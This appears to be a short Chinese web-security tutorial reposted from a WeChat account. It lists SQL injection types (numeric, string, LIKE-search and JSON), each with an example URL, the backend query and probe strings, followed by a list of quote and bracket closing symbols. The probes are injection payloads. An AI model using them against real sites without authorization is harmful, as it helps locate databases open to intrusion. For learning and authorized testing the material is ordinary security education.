常见的sql注入类型闭合及符号

1337163122

常见的sql注入类型闭合及符号yushao web安全工具库 今天
不是少年守不住初心，而是岁月慌了人心。。。
----  网易云热评
一、数字型注入
1、存在注入的url

1. ​www.baidu.con/aiyou.php?id=1
   

复制代码

2、数据库查询的语句

1. ​select * from aiyou where id=1
   

复制代码

3、测试语句

1. ​1 and 1=2

复制代码

二、字符型注入
1、存在注入的url

1. ​www.baidu.con/aiyou.php?id=1
   

复制代码

2、数据库查询的语句

1. ​select * from aiyou where id='1'

复制代码

3、测试语句

1. 1' and '1'='1
   
2. 1' and 1=1 --

复制代码

三、搜索型注入
1、存在注入的url

1. ​www.baidu.con/aiyou.php?id=1

复制代码

2、数据库查询的语句

1. ​select * from aiyou where id like '%1%'

复制代码

3、测试语句

1. ​1%' and 1=1 and '%'='

复制代码

四、json型注入
1、存在注入的url

1. ​www.baidu.con/aiyou.php?id=1

复制代码

2、数据库查询的语句

1. {
   
2.     "id":"1"
   
3. }

复制代码

3、测试语句

1. {
   
2.     "id":"1 and 1=1"
   
3. }

复制代码

五、常见闭合符号

1. ​' "  ) ') ") ')) }

复制代码

禁止非法，后果自负
欢迎关注公众号：web安全工具库
欢迎关注视频号：之乎者也吧